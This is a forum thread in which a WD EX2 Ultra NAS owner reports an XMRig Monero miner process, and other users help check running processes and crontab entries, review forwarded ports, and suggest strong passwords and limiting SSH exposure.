XMRIG process using massive CPU power! (miner for Monero?)

Hi,
My EX2 Ultra was working really hard so I checked the running processes and found a process called XMRIG. A short google search revealed this:“ XMRig is a miner specifically, a type of threat that is used to make money at the expense of computer users by using the infected computer users to mine Monero, a cryptocurrency. XMRig can cause a computer to overheat and perform poorly, since XMRig uses additional system resources, taking these away from the victim. ”. This doesn’t sound good… I turned off the FTP access and changed passwords. It seemed to have stopped now.
How can I (through SSH for example) check whether there is a real threat?

What’s the output of the commands below?

ps -fe | grep -i xmrig
crontab -l

12075 root 2592 S grep -i xmrig
and
0 3 * * * /usr/sbin/daily_log_upload.sh &
0 3 * * * /usr/sbin/traceroute_wd.sh &
*/30 * * * * /usr/sbin/quota_monitor &
0 */4 * * * /usr/sbin/rlog -s /usr/local/modules/files/syslog_rotate.conf
01 */8 * * * [ -f /etc/init.d/atop ] && /etc/init.d/atop rotate
30 0 * * * /usr/local/sbin/ssl_cert_job.sh start > /var/log/ssl_cert_cron.out 2>&1
0 0 * * * random_chk_central -s &
30 0 * * 1 logwdmsg -e &
0 3 * * * logwdmsg -o &
01 3 * * * /usr/local/sbin/LogDataSize.sh
00 3 * * * /usr/sbin/wd_rotate.sh
30 0 * * 1 /usr/sbin/wdappmgr_log_stats.py > /dev/null 2>&1 &
30 2 * * * /usr/sbin/stime&
0 3 * * * wd_crontab.sh&
0 4 * * * auto_fw -a -c&
0 0 * * * auto_clear_recycle_bin.sh &
30 3 * * * /usr/sbin/chk_wfs_download&
0 0 * * * /bin/sh /usr/local/config/mycloud &
*/15 * * * * ga_cron.sh quarter &
26 4 * * * ga_cron.sh daily &
0 0 * * * random_check -s &
0 0 * * * expire.sh
9 3 * * * /usr/local/sbin/PullWdlogConfig.sh
18 14 * * * auto_fw -c 1 &

          • sysinfo_update.sh
            0 3 * * 1 getHddWhiteList.sh

So, I don’t see any xmrig running or anything different in your crontab.
Where did you see it running?

You are not alone…

Do you have any other details?
Did it happen after you install something?
do you use Transmission?
Was your NAS updated when it happened?
What ports are being redirected to your NAS?

Did it happen after you install something?
Not 100 sure, but do not think so.

do you use Transmission?
yes

Was your NAS updated when it happened?
yes, latest available ver of firmware, 2.31.204

What ports are being redirected to your NAS?
9092 and 53934 - transmission webinterface and incoming connection port
32400 - plex
22 - SSH
8186 - PlexPy
443 for WD webinterface

I just realized that my NAS has no way to check for login failures :face_with_raised_eyebrow:
In your case, the main attack vectors would be SSH or Transmission, in case you downlaoded something malicious. Unfortunately, the logs available on /var/log are useless. Just make sure your sshd password is strong because you could be a victim of a brute force attack. Ideally, your ssh service should not be available to the internet.

I think it has… /var//log/user.log No SSH however. dmesq output has some info on SSH brute force attempts but I was not able to sort out the timestamps so no idea when that was.

Anyway, changed the admin and ssh pwds to 16 chars randoms so should be a bit safer. I will set a vpn for transmission and server webinterface, but other (torrent and plex) cant be helped. It just kills me that I do not know where it got through…

I had FTP open when I had it. I turned it off and set the SSH also to 16b random pwd. It doesnt seem to pop up anymore now.